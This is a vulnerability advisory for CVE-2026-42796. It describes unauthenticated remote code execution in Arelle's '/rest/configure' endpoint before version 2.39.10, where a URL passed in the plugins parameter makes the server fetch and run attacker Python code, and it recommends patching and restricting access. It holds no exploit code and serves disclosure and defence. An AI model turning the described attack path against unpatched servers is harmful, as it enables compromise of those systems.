CVE-2026-42796

Name of the Vulnerable Software and Affected Versions Arelle versions prior to 2.39.10

Description An unauthenticated remote code execution issue exists in the '/rest/configure' REST endpoint. The endpoint accepts a plugins query parameter and forwards it to the plugin manager without requiring authentication or authorization. This allows an attacker to provide a URL to a malicious Python file via the plugins parameter, leading the Arelle webserver to download and execute the attacker-controlled code with the privileges of the Arelle process.

Recommendations Update to version 2.39.10. As a temporary workaround, restrict access to the '/rest/configure' endpoint to minimize the risk of exploitation.